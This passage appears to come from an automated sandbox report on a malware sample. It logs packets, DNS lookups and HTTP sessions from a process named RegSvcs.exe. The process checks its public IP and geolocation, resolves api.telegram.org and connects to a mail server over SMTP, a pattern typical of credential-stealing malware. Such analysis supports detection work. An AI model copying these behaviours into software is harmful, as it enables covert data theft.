                                                                                Oct 10, 2024 13:18:40.193643093 CEST49855587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:40.198448896 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:40.198458910 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:40.198508978 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:40.198518038 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:40.654589891 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:40.703332901 CEST49855587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:42.160068035 CEST49855587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:42.164938927 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:42.844537973 CEST5874985546.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:42.851727962 CEST49855587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:42.852519035 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:42.857454062 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:42.857508898 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:43.944750071 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:43.944957972 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:43.949831009 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.208899021 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.209065914 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:44.213896990 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.471580982 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.472210884 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:44.477014065 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.745240927 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.746145010 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.746258020 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:44.875221014 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:44.877187967 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:44.882896900 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.140770912 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.149759054 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:45.154598951 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.413048029 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.413775921 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:45.418878078 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.676866055 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.677135944 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:45.683270931 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.951421976 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:45.951818943 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:45.957612038 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.217562914 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.217771053 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:46.222918987 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.541892052 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.542125940 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:46.547197104 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.804673910 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.805000067 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:46.805063963 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:46.805078983 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:46.805114985 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:18:46.809827089 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.809906960 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.810175896 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.810205936 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:46.810237885 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:47.271413088 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:18:47.328326941 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:20:22.187763929 CEST49901587192.168.2.546.151.208.21
                                                                                Oct 10, 2024 13:20:22.195282936 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:20:22.873939037 CEST5874990146.151.208.21192.168.2.5
                                                                                Oct 10, 2024 13:20:22.874603987 CEST49901587192.168.2.546.151.208.21
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 10, 2024 13:18:16.733247042 CEST5967753192.168.2.51.1.1.1
                                                                                Oct 10, 2024 13:18:16.740395069 CEST53596771.1.1.1192.168.2.5
                                                                                Oct 10, 2024 13:18:17.795291901 CEST6375653192.168.2.51.1.1.1
                                                                                Oct 10, 2024 13:18:17.802838087 CEST53637561.1.1.1192.168.2.5
                                                                                Oct 10, 2024 13:18:28.619482994 CEST5379853192.168.2.51.1.1.1
                                                                                Oct 10, 2024 13:18:28.626507044 CEST53537981.1.1.1192.168.2.5
                                                                                Oct 10, 2024 13:18:34.974158049 CEST6310053192.168.2.51.1.1.1
                                                                                Oct 10, 2024 13:18:35.642896891 CEST53631001.1.1.1192.168.2.5
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 10, 2024 13:18:16.733247042 CEST192.168.2.51.1.1.10xcf99Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:17.795291901 CEST192.168.2.51.1.1.10x1023Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:28.619482994 CEST192.168.2.51.1.1.10x9025Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:34.974158049 CEST192.168.2.51.1.1.10x45ffStandard query (0)mail.irco.com.saA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 10, 2024 13:18:16.740395069 CEST1.1.1.1192.168.2.50xcf99No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:16.740395069 CEST1.1.1.1192.168.2.50xcf99No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:16.740395069 CEST1.1.1.1192.168.2.50xcf99No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:16.740395069 CEST1.1.1.1192.168.2.50xcf99No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:16.740395069 CEST1.1.1.1192.168.2.50xcf99No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:16.740395069 CEST1.1.1.1192.168.2.50xcf99No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:17.802838087 CEST1.1.1.1192.168.2.50x1023No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:17.802838087 CEST1.1.1.1192.168.2.50x1023No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:28.626507044 CEST1.1.1.1192.168.2.50x9025No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 13:18:35.642896891 CEST1.1.1.1192.168.2.50x45ffNo error (0)mail.irco.com.sa46.151.208.21A (IP address)IN (0x0001)false
                                                                                • reallyfreegeoip.org
                                                                                • api.telegram.org
                                                                                • checkip.dyndns.org
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549726158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:16.763003111 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 10, 2024 13:18:17.331062078 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: fdc64d94b6c86dd95dcae600a269c1da
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                Oct 10, 2024 13:18:17.339823008 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 10, 2024 13:18:17.714553118 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 6b057ca40a72f88ed04681fafe573df3
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                Oct 10, 2024 13:18:17.719645977 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 6b057ca40a72f88ed04681fafe573df3
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                Oct 10, 2024 13:18:18.712177038 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 10, 2024 13:18:18.864356995 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:18 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: dcfcd562fc188b0f8c250b4e51c601b1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549744158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:19.480010033 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 10, 2024 13:18:20.049146891 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:19 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 4105ade66166387c4bf033881ba7112a
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549753158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:20.696208000 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 10, 2024 13:18:21.293426037 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:21 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 7b21703edcd8fdb27c2fe8d2c7ec0275
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549765158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:21.903557062 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 10, 2024 13:18:22.471918106 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: d060b483dcb25fab5bc0295653cd47d0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549772158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:23.246706963 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 10, 2024 13:18:23.818948030 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 6f00fca24a26199bae30cd7621fb6560
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549784158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:24.725722075 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 10, 2024 13:18:25.294056892 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 1c305b212fc1b83d23d5df02f9461421
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549798158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:25.900031090 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 10, 2024 13:18:26.586076021 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: a73f0778b744b980af902f0d03ee2f68
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549805158.101.44.242807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 13:18:27.204226017 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 10, 2024 13:18:27.974838972 CEST320INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 103
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 07261e92017983bebc5bfeb814b56aa2
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549732188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:18 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:18 UTC714INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13791
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zh9tJ8Oh1wrvK0e72yLsAQYSuiZ3gu1qPhs%2F9GH%2FpqH2pqTXlNHZGp2uXSOV%2FvFH3dD4obcaxi9SSanAPsn2u%2BjkguFuJbc%2FLXXnCeETIyXKre07%2FRO%2B1GQ8sXlP7emK6JGkJZ3b"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d06357e5bc27274-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549738188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:19 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-10 11:18:19 UTC716INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:19 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13792
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKQnzUS3j1RI%2FrNxvRTN7Z%2BB8ec0UEwmssYDxmjkCaPi3W5mvpDnQV%2BAnUSaevgOlWVZ%2F2hFWF4oaUoYQMN%2FNsLnGU4Bmz6p8sTe2XxiKKteqM9vsi3HPe%2BdMasMPZEqlk%2BFC%2FbW"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d0635835aa2728f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
